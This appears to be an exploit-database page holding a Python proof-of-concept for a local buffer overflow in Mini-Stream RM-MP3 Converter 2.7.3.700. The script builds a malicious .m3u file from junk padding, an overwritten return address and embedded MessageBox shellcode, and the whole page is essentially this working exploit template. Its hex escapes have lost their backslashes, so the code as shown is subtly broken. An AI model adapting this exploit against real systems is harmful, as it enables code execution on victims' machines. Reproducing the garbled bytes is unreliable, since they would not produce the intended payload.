Home / os / blackberry

Mini-Stream RM-MP3 Converter 2.7.3.700 Buffer Overflow

Posted on 25 March 2015

#!/usr/bin/env python #[+] Author: TUNISIAN CYBER #[+] Exploit Title: Mini-sream RM-MP3 Converter v2.7.3.700 Local Buffer Overflow #[+] Date: 25-03-2015 #[+] Type: Local Exploits #[+] Tested on: WinXp/Windows 7 Pro #[+] Vendor: http://software-files-a.cnet.com/s/software/10/65/60/49/Mini-streamRM-MP3Converter.exe?token=1427318981_98f71d0e10e2e3bd2e730179341feb0a&fileName=Mini-streamRM-MP3Converter.exe #[+] Friendly Sites: sec4ever.com #[+] Twitter: @TCYB3R #[+] Related Vulnerability/ies: # http://www.exploit-db.com/exploits/18726/ #POC: #IMG1: #http://i.imgur.com/ESt0CH8.png #IMG2: #http://i.imgur.com/K39tpYj.png from struct import pack file="crack.m3u" junk="x41"*35032 eip=pack('<I',0x7C9D30D7) junk2="x44"*4 #Messagebox Shellcode (113 bytes) - Any Windows Version By Giuseppe D'Amore #http://www.exploit-db.com/exploits/28996/ shellcode= ("x31xd2xb2x30x64x8bx12x8bx52x0cx8bx52x1cx8bx42" "x08x8bx72x20x8bx12x80x7ex0cx33x75xf2x89xc7x03" "x78x3cx8bx57x78x01xc2x8bx7ax20x01xc7x31xedx8b" "x34xafx01xc6x45x81x3ex46x61x74x61x75xf2x81x7e" "x08x45x78x69x74x75xe9x8bx7ax24x01xc7x66x8bx2c" "x6fx8bx7ax1cx01xc7x8bx7cxafxfcx01xc7x68x79x74" "x65x01x68x6bx65x6ex42x68x20x42x72x6fx89xe1xfe" "x49x0bx31xc0x51x50xffxd7") writeFile = open (file, "w") writeFile.write(junk+eip+junk2+shellcode) writeFile.close()

 

TOP